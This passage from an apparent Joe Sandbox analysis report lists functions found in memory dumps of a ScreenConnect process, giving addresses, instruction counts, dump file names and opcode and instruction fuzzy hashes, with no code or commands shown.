                                                                                    • Instruction ID: 96649db05aa0116848544beb1a0c7e3377f5df64aa46868d94073ac80f3e4388
                                                                                    • Opcode Fuzzy Hash: 198af2251eed417833ba3e9e7a2794df8a91b13c7caa2dd2c4a78abaf6c4f986
                                                                                    • Instruction Fuzzy Hash: 5961C375B002058FDB04EF79D484AAEBBF6FF88214B14846AD509DB365EB70EC06CB91
                                                                                    Function 046159A8 Relevance: .2, Instructions: 155COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0fc25618061eded6956b7df1fd8c8f62e55f8363b33cdc686a0400b86d785bfa
                                                                                    • Instruction ID: 67310f819ecc1815e2cc35eb6556d76c9d4a9c192fbdf6b10f5d3a07b0cd2363
                                                                                    • Opcode Fuzzy Hash: 0fc25618061eded6956b7df1fd8c8f62e55f8363b33cdc686a0400b86d785bfa
                                                                                    • Instruction Fuzzy Hash: 4051EE30701305AFD715EB7AD990A2EB7E6EBD8710B58852AD0168F384FF74EC458B91
                                                                                    Function 046147F0 Relevance: .1, Instructions: 147COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7ba33724175c32032cda627d826d26275470b9f0facd3a7e4e1f34d0eb80a9f5
                                                                                    • Instruction ID: 9d38dc861b11f1d4faaf5c7463e27d6877fd428b3690e65bd7cf80699e409783
                                                                                    • Opcode Fuzzy Hash: 7ba33724175c32032cda627d826d26275470b9f0facd3a7e4e1f34d0eb80a9f5
                                                                                    • Instruction Fuzzy Hash: 7651F6707006068FDB24DF7AD88495AB7F2FF993147148A58E49ADB7A4EB30F8058F90
                                                                                    Function 04615980 Relevance: .1, Instructions: 146COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b496b70a19c9469efdebac45572f349e0ae706e2d4ff61eacc292ef634197b88
                                                                                    • Instruction ID: f2ea51985124db71032d0802c4c04d66d26bbd62e1385fae17fc83f970a32487
                                                                                    • Opcode Fuzzy Hash: b496b70a19c9469efdebac45572f349e0ae706e2d4ff61eacc292ef634197b88
                                                                                    • Instruction Fuzzy Hash: C0510E307063419FD705AB7AD890A2EBBE2EBD9710B18852AD016CF395FE74EC45CB91
                                                                                    Function 04616498 Relevance: .1, Instructions: 130COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 30c93ae330e9c14f292d008b914161178290fdcd4083d093f758274a2faef283
                                                                                    • Instruction ID: 1ab1f42922a7ee7cc0dcedc2b1ecc9816bc7d78ed0b27150dcce1024e0e948c6
                                                                                    • Opcode Fuzzy Hash: 30c93ae330e9c14f292d008b914161178290fdcd4083d093f758274a2faef283
                                                                                    • Instruction Fuzzy Hash: 7541B874600B018FD734DF29D858626B7F1BF99325B148A6CE496DB7A5E730F846CB80
                                                                                    Function 04615E68 Relevance: .1, Instructions: 117COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bcd8c8292619989fa94d01d4514f10ee869803e57b9eaf403512029cf4779bbe
                                                                                    • Instruction ID: ecdc882a3a23b3037ad38dd3a7c0de47420410c329bf257b8cfe8bc839559aa4
                                                                                    • Opcode Fuzzy Hash: bcd8c8292619989fa94d01d4514f10ee869803e57b9eaf403512029cf4779bbe
                                                                                    • Instruction Fuzzy Hash: 2B412B746047059FD720DF29C884A5ABBF2FF89314B188A58E4869B7A5E730F846CF90
                                                                                    Function 04616752 Relevance: .1, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: af7c38bd33e7082ab6d714d80338349704d6109fe7dacbc2ec32ef81cf27c0d0
                                                                                    • Instruction ID: a2dd333795c473a1b360af652c1459f6083fa75697c27e2090f2a31ff41fbd79
                                                                                    • Opcode Fuzzy Hash: af7c38bd33e7082ab6d714d80338349704d6109fe7dacbc2ec32ef81cf27c0d0
                                                                                    • Instruction Fuzzy Hash: FD41D2769082888FDB11CF78D594B99BFF1FF5A310F19419DC0459B371EA28A845CB61
                                                                                    Function 04614620 Relevance: .1, Instructions: 106COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ff2f14432d0fef11ff43bc5c4f2b5e6ee30aca875aac176356acaad2ed14befc
                                                                                    • Instruction ID: 02216c2c35cb62a90eb6524299396dbecb3d0d93e45b93c191f430aa4ba7939b
                                                                                    • Opcode Fuzzy Hash: ff2f14432d0fef11ff43bc5c4f2b5e6ee30aca875aac176356acaad2ed14befc
                                                                                    • Instruction Fuzzy Hash: C4313A70B106158FDF04DFA9D4949AEF7E6EF89214B14852AD409EB758EB30FC018BD1
                                                                                    Function 04617298 Relevance: .1, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7b201e49d6617c63909d1ab123d87b9d58493f9d873387b93d0dca9de407467d
                                                                                    • Instruction ID: 16d4ef95b7164c6874de1e6ee68e19de2ffb5a59a9f2079e6c6b29dd222fe7c0
                                                                                    • Opcode Fuzzy Hash: 7b201e49d6617c63909d1ab123d87b9d58493f9d873387b93d0dca9de407467d
                                                                                    • Instruction Fuzzy Hash: A04116787006028FCB14DF69D99896ABBF2FF893107148968E91A9B365EB30FC41CB51
                                                                                    Function 046172A8 Relevance: .1, Instructions: 95COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 371f475f9e58e10cae67e1a18a78ac9426ee2ead9d63cf25f30e52ac91f99ab3
                                                                                    • Instruction ID: c0a316bebf617d3209c94da7b16f0c4878dc666dbacc2bea961e646b8d862bda
                                                                                    • Opcode Fuzzy Hash: 371f475f9e58e10cae67e1a18a78ac9426ee2ead9d63cf25f30e52ac91f99ab3
                                                                                    • Instruction Fuzzy Hash: 9C3107787006028FCB14DF6AD594D6AB7F2FF887157148968E91A9B365EB30FC40CB50
                                                                                    Function 046108C0 Relevance: .1, Instructions: 92COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 180964c67f7b82ed25f9aea90cd276054417ab746317834d69c8bae9a461dc54
                                                                                    • Instruction ID: e939848755a97e5bda5c1189c2c16fc6f6df45995fee561acb285bc1da652aad
                                                                                    • Opcode Fuzzy Hash: 180964c67f7b82ed25f9aea90cd276054417ab746317834d69c8bae9a461dc54
                                                                                    • Instruction Fuzzy Hash: D421BEA254E3C15FD70387B89861AD5BFA0DF57124B1E85CBD588CB1A3E628994BC322
                                                                                    Function 04614A38 Relevance: .1, Instructions: 92COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3b821429e6c1ae58843038144902fd44a725afb871370cd3dee961aa70807a5a
                                                                                    • Instruction ID: 8226edd2238607c2e060d50a897f6b2957c0a11f44f1dfd3267c7884dde52973
                                                                                    • Opcode Fuzzy Hash: 3b821429e6c1ae58843038144902fd44a725afb871370cd3dee961aa70807a5a
                                                                                    • Instruction Fuzzy Hash: AE310B706047018BC734DF3AD85865ABBF1BF84721B144B2CE456876E4EB30A945CB91
                                                                                    Function 04617143 Relevance: .1, Instructions: 87COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d17960ed4aec2e28fa280027833fd1f4d3d95ad3de67b5498745e6cc0bc4f253
                                                                                    • Instruction ID: 64e1e90c6a0842db57a5e14c0ef989cdb26d639c8c361781ba307646f9ef2749
                                                                                    • Opcode Fuzzy Hash: d17960ed4aec2e28fa280027833fd1f4d3d95ad3de67b5498745e6cc0bc4f253
                                                                                    • Instruction Fuzzy Hash: 70315E34A052489FDB14DFA4C995AADBBF1BF4D305F288498E406BB361DB31ED42CB50
                                                                                    Function 04617150 Relevance: .1, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d72836b7db61cd049eb6af65026e48d8b7284cd33749d874c637a3ed139dbc7a
                                                                                    • Instruction ID: fb894091c3ef110811436330f023749c2a4352978831c9b895b36047ff50d569
                                                                                    • Opcode Fuzzy Hash: d72836b7db61cd049eb6af65026e48d8b7284cd33749d874c637a3ed139dbc7a
                                                                                    • Instruction Fuzzy Hash: C0315035A042489FDB14DFA4C894AADBBF1BF4D305F284499E506AB361DB31ED42CF50
                                                                                    Function 0170D670 Relevance: .1, Instructions: 75COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3518905043.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_170d000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 71c65e798f65000989a94bd585cf8f61fb3e68d9a9582d5d6486406261b2aadc
                                                                                    • Instruction ID: 6abd15859f6df8ddb63e8c8a1eea30879aef85c79dbecba722279030f67746f2
                                                                                    • Opcode Fuzzy Hash: 71c65e798f65000989a94bd585cf8f61fb3e68d9a9582d5d6486406261b2aadc
                                                                                    • Instruction Fuzzy Hash: 4C2128B5504380DFDB26DFD8D9C0B26FFA5FB88310F2485A9E9090B296C336D416CAA1
                                                                                    Function 04610890 Relevance: .1, Instructions: 74COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 593e00ea4a0e5c4b9bf571fd0a31875745c3dc412ead25ef2ddc0da746635461
                                                                                    • Instruction ID: d88ba471895b88ed2a63ea2bc92b1390c5bcd4195fcc460dead9b2ca937dfa2e
                                                                                    • Opcode Fuzzy Hash: 593e00ea4a0e5c4b9bf571fd0a31875745c3dc412ead25ef2ddc0da746635461
                                                                                    • Instruction Fuzzy Hash: E421C09654E3C15FD7038B789864AC5BF649F57124B0EC0CBD488CB2A3E629895BC322
                                                                                    Function 046167A0 Relevance: .1, Instructions: 70COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9c8c5fdb0d873b992eca3d6cd7675722d31dce7a37f1936b673356c87c28e89e
                                                                                    • Instruction ID: 53b2846a75f2411085b216081a0067555510040b3834eaea23cb1db8b95393b8
                                                                                    • Opcode Fuzzy Hash: 9c8c5fdb0d873b992eca3d6cd7675722d31dce7a37f1936b673356c87c28e89e
                                                                                    • Instruction Fuzzy Hash: AC212875A001198FDB54DFA8D458AEDBBF2BF89314F054069D409AB3B0EB74AC45CBA1
                                                                                    Function 04613549 Relevance: .1, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 20cc2df917a25273eaf7909eb96482644e4e01f75971fe686d01279459ffd712
                                                                                    • Instruction ID: 9f974d3c8bcb4a8acda9d4d8c1dbc3d271427a245c6d6cd69833b7553227c21d
                                                                                    • Opcode Fuzzy Hash: 20cc2df917a25273eaf7909eb96482644e4e01f75971fe686d01279459ffd712
                                                                                    • Instruction Fuzzy Hash: 6C219230211302AFD315EB25D894BA9BBE6FF89310F108928E5059F698EF70BC45CBE1
                                                                                    Function 04616FE8 Relevance: .1, Instructions: 62COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 462e77a3e8cbb4c42d56a3d639cfa6bd986ebb25c64ef03d25583c6b6d1eee93
                                                                                    • Instruction ID: d1685a677902acad218dd124e943d686869d52d191f69fe5110b468b6ad8a430
                                                                                    • Opcode Fuzzy Hash: 462e77a3e8cbb4c42d56a3d639cfa6bd986ebb25c64ef03d25583c6b6d1eee93
                                                                                    • Instruction Fuzzy Hash: CA21C0B1A05344CFC710DFA8D545AAABFF0EF49322F1485A9E519DB3A1E731E942CB90
                                                                                    Function 04610B2C Relevance: .1, Instructions: 62COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5f426b522c7befc01e0dd6f9ddd7d4ea4eb34681917d8b4162bbc078be08e658
                                                                                    • Instruction ID: f7dff827c092c890996c07f8bed77f19e1f98dda5a13a667b13a667f1350c432
                                                                                    • Opcode Fuzzy Hash: 5f426b522c7befc01e0dd6f9ddd7d4ea4eb34681917d8b4162bbc078be08e658
                                                                                    • Instruction Fuzzy Hash: 4521E731D10B0A99CF00EFB9D8445EEF7B4EF99210F10D72AE559B7110FB70A6958B91
                                                                                    Function 04613D62 Relevance: .1, Instructions: 60COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4ab7b03c88a664c5b724592a5333b50af1c2b861efafef8c460b3dc9230c0632
                                                                                    • Instruction ID: 30d623004315825ffb32789636634fe924f8af14ad1e10550017ba0aa7f8ccb8
                                                                                    • Opcode Fuzzy Hash: 4ab7b03c88a664c5b724592a5333b50af1c2b861efafef8c460b3dc9230c0632
                                                                                    • Instruction Fuzzy Hash: E82195B4A0020A9FDB04EFA6D5655AEBBF6FF88200B004899D515AB358EB30BD41CF61
                                                                                    Function 04611830 Relevance: .1, Instructions: 60COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8cc4cf2ff134df2547ab3fd3ace314d5d60dfcd5ecd41ff1fff5dbd9855877b9
                                                                                    • Instruction ID: 746652752f31373e56a00185881d25e00141d91f4a488badeefa209a5b0a9274
                                                                                    • Opcode Fuzzy Hash: 8cc4cf2ff134df2547ab3fd3ace314d5d60dfcd5ecd41ff1fff5dbd9855877b9
                                                                                    • Instruction Fuzzy Hash: 1001807B3051508F8709EA6DF4949EDB7A6EBDD220315C07BE509C7365DA32DC078764
                                                                                    Function 04614610 Relevance: .1, Instructions: 58COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3d8d7b894f740031aa12a640e57510d8b013e5200ea6c363cd466935d4ea697f
                                                                                    • Instruction ID: 5bae741b608b188d8fd2488054d3f73bc5cb6b6ce954dd0048ee46fea890b21a
                                                                                    • Opcode Fuzzy Hash: 3d8d7b894f740031aa12a640e57510d8b013e5200ea6c363cd466935d4ea697f
                                                                                    • Instruction Fuzzy Hash: 0F11ED207006119FCB14EB79844496EBBEA9F86668B54886DD409CB765FF30FC058BD1
                                                                                    Function 04613D70 Relevance: .1, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: af8b4c291f51bf34d5a41584df77c5e9d4cda12ac7c888e2f90a8c742cefe9a6
                                                                                    • Instruction ID: c05251bcbaa74a29008bc55c92b54243a65ea9c35de302682a583dea14619225
                                                                                    • Opcode Fuzzy Hash: af8b4c291f51bf34d5a41584df77c5e9d4cda12ac7c888e2f90a8c742cefe9a6
                                                                                    • Instruction Fuzzy Hash: 352166B4A0020A9FDB44EFA6D5645AEBBF6FB88304B104854D506AB358EB70BD41CFA1
                                                                                    Function 0170D66B Relevance: .1, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3518905043.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_170d000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                                    • Instruction ID: 749e0870ad95853f0b64ea5a612bc1e2ca4b1c7dbb87ce029030c4b962efc336
                                                                                    • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                                    • Instruction Fuzzy Hash: 44119D76504380CFDB16CF94D9C4B16BFA2FB88324F2486A9D9094B256C33AD45ACBA1
                                                                                    Function 04610438 Relevance: .1, Instructions: 54COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2439616f0ca78fef6596176902334de506f1251ccddacdf97bfc24b4e91a0dee
                                                                                    • Instruction ID: 098dc8f93329e82cccf18bcec57ff1bc03fd87f6243cf886bece0b07e8a7bdf4
                                                                                    • Opcode Fuzzy Hash: 2439616f0ca78fef6596176902334de506f1251ccddacdf97bfc24b4e91a0dee
                                                                                    • Instruction Fuzzy Hash: B3114F71A00219CFCB44DF69C9815AEBBF1FF89310714C065E919EB221FA31AA029B90
                                                                                    Function 04616DE8 Relevance: .1, Instructions: 52COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 66dc6f185433d21722e93a4d2f98016c44ea24786179b26326f9c3c0a2c58a1a
                                                                                    • Instruction ID: 616d07f4377d45a6fa26e6dc97120d485e12120f293c11a4d03d09b9d299e98f
                                                                                    • Opcode Fuzzy Hash: 66dc6f185433d21722e93a4d2f98016c44ea24786179b26326f9c3c0a2c58a1a
                                                                                    • Instruction Fuzzy Hash: 1D018C397006128F8724DF29C484A1EB7E6EFCC6253284568E94ADB365EB30FC02CBD0
                                                                                    Function 046117A1 Relevance: .1, Instructions: 52COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3aa657f5f9593ba4afe39a1f7ae9144c9ebfb74c502651f9006ca07fb3777b6e
                                                                                    • Instruction ID: ec421f6e977f9503bdfcde47f152da600ef3bbfd7f21f86d6a13784bce9190f5
                                                                                    • Opcode Fuzzy Hash: 3aa657f5f9593ba4afe39a1f7ae9144c9ebfb74c502651f9006ca07fb3777b6e
                                                                                    • Instruction Fuzzy Hash: 1E0124B26093811FC303667AA8904C67FA9EE9A610309849BE155CB227F954ED0BC761
                                                                                    Function 04616630 Relevance: .1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5143db8d629bc22502009741a9e8dbe194aafbfe08d1bee2efe945b72e8d22d5
                                                                                    • Instruction ID: 1a4fc629db3b7687005949e9c8b347c5437a482e3ce94c677859016d75f1d86b
                                                                                    • Opcode Fuzzy Hash: 5143db8d629bc22502009741a9e8dbe194aafbfe08d1bee2efe945b72e8d22d5
                                                                                    • Instruction Fuzzy Hash: 9401757670011A9FCF10DFA9D8409EEBBF8EF95215B04807AD914D7210EA30B515CBE1
                                                                                    Function 04616A98 Relevance: .0, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1bd6c53944c456826aca6d562dbfbd77c809b7c915dc94112b1eca8db80598ca
                                                                                    • Instruction ID: 260ce6e6aba1e8682112dd3d1d9a957fde06bc58ef24032be2d09eb492a0aff5
                                                                                    • Opcode Fuzzy Hash: 1bd6c53944c456826aca6d562dbfbd77c809b7c915dc94112b1eca8db80598ca
                                                                                    • Instruction Fuzzy Hash: 670184713013015BD705BB7A945966FBAD3EBD8264754CD29E10E9F388FE30EC098791
                                                                                    Function 0170D01D Relevance: .0, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3518905043.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_170d000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 558189e3b1282544d8a016a884897591ee0d5449beb645ff78750ef6702d356a
                                                                                    • Instruction ID: 96f0d0d6aba65259ff3a4e436e23a33446805bd3c3faa82420d37871a985e241
                                                                                    • Opcode Fuzzy Hash: 558189e3b1282544d8a016a884897591ee0d5449beb645ff78750ef6702d356a
                                                                                    • Instruction Fuzzy Hash: 3E01F771504340DAE732CADAC884B66FFE8DF453A0F08C459ED4D4F1C2C2799841C6B1
                                                                                    Function 046166A8 Relevance: .0, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
